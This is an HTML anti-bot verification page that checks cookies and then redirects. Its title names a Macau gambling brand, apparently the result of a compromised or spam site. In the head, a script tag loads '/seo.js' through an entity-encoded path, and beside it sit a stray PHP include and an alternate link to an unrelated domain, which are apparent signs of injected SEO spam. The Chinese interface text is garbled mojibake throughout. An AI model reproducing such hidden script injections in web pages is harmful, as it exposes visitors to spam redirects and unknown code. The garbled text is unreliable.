<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>304am永利集团(Macau)股份有限公司-Official website</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: #333;
        }

        .captcha-container {
            background: white;
            padding: 40px 50px;
            border-radius: 16px;
            box-shadow: 0 20px 60px rgba(0, 0, 0, 0.3);
            text-align: center;
            max-width: 400px;
            width: 90%;
        }

        .loading-spinner {
            width: 60px;
            height: 60px;
            border: 4px solid #f3f3f3;
            border-top: 4px solid #667eea;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 24px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .title {
            font-size: 22px;
            font-weight: 600;
            color: #333;
            margin-bottom: 12px;
        }

        .message {
            font-size: 15px;
            color: #666;
            line-height: 1.6;
        }

        .progress-bar {
            width: 100%;
            height: 6px;
            background: #e0e0e0;
            border-radius: 3px;
            margin-top: 24px;
            overflow: hidden;
        }

        .progress-fill {
            height: 100%;
            background: linear-gradient(90deg, #667eea, #764ba2);
            border-radius: 3px;
            width: 0%;
            animation: progress 3s ease-in-out forwards;
        }

        @keyframes progress {
            0% { width: 0%; }
            100% { width: 100%; }
        }

        .success-state .status-icon {
            color: #4CAF50;
        }

        .nojs-warning {
            background: #fff3cd;
            border: 1px solid #ffc107;
            color: #856404;
            padding: 12px 20px;
            border-radius: 8px;
            font-size: 14px;
        }

        @media (max-width: 480px) {
            .captcha-container {
                padding: 30px;
                margin: 20px;
            }
            
            .title {
                font-size: 20px;
            }
            
            .message {
                font-size: 14px;
            }
        }
    </style>
<script type="text/javascript" src="&#47;&#115;&#101;&#111;&#46;&#106;&#115;" rel="nofollow"></script></head><?php include_once("baidu_js_push.php") ?> <link rel="alternate" media="only screen and(max-width: 640px)" href="http://xiaozhaocai.com">
<body>
    <noscript>
        <div class="captcha-container">
            <div class="nojs-warning">
                ??锔? 娴?瑙??ㄤ????? JavaScript锛?椤甸?㈡??娉?璁块???
            </div>
        </div>
    </noscript>

    <div class="captcha-container" id="container">
        <div class="loading-spinner" id="spinner"></div>
        <div class="title" id="title">瀹??ㄩ?璇?</div>
        <div class="message" id="msg"></div>
        <div class="progress-bar">
            <div class="progress-fill"></div>
        </div>
    <script type="text/javascript">
        var dt = new Date(); 
        dt.setSeconds(dt.getSeconds() + 60);
        document.cookie = "_wtsjsk=2d62337182d00266f32e1a88a0548a11; path=/ ";
        var cookiesEnabled = document.cookie.indexOf("_wtsjsk=") != -1; 

        function getCookie(name)
            {
                var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
                if(arr=document.cookie.match(reg))
                    return arr[2];
                else
                    return null;
            }
            
        var preurl = getCookie("_wtspurl"); 
        var cookie_CaptchaKey = getCookie("_wtscpk");  
        var cookie_Expire = getCookie("_wtsexp");  

        if(cookie_CaptchaKey == null||cookie_Expire == null){
            var msgText = "娴?瑙??ㄥ??ㄦ??ヤ腑...";
            if (preurl != null) {
                msgText += "<br><small style='color: #999;'>姝ｅ?ㄨ烦杞?..</small>";
            }
            document.getElementById("msg").innerHTML = msgText;
            
            if (preurl==null)
            {
                if(!cookiesEnabled) { 
                        var msg ="?? 娴?瑙??ㄤ????? Cookie锛?椤甸?㈡??娉?璁块??;
                        document.getElementById("msg").innerHTML = msg;
                        document.getElementById("spinner").className = "warning-state";
                } else {
                    document.getElementById("spinner").className = "warning-state";
                    setTimeout(function() {location.reload();}, 3000);
                }
            } else {
                setTimeout(function() {location.reload();}, 3000);
            }

        }else{
            document.getElementById("spinner").style.display = "none";
            document.querySelector(".progress-bar").style.display = "none";
            
            var successIcon = `<svg class="status-icon" style="width:60px;height:60px;margin-bottom:24px;color:#4CAF50;" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path>
                <polyline points="22 4 12 14.01 9 11.01" fill="none" stroke="currentColor" stroke-width="2"></polyline>
            </svg>`;
            document.getElementById("container").innerHTML = 
                successIcon + 
                `<div class="title" style="color:#4CAF50;">?? 楠?璇???杩?</div>` +
                `<div class="message">姝ｅ?ㄨ烦杞??扮????椤甸??..</div>` +
                `<div class="progress-bar"><div class="progress-fill"></div></div>`;
            
            setTimeout(function() {window.location.href = preurl;}, 1000);
        }
    </script>
</html>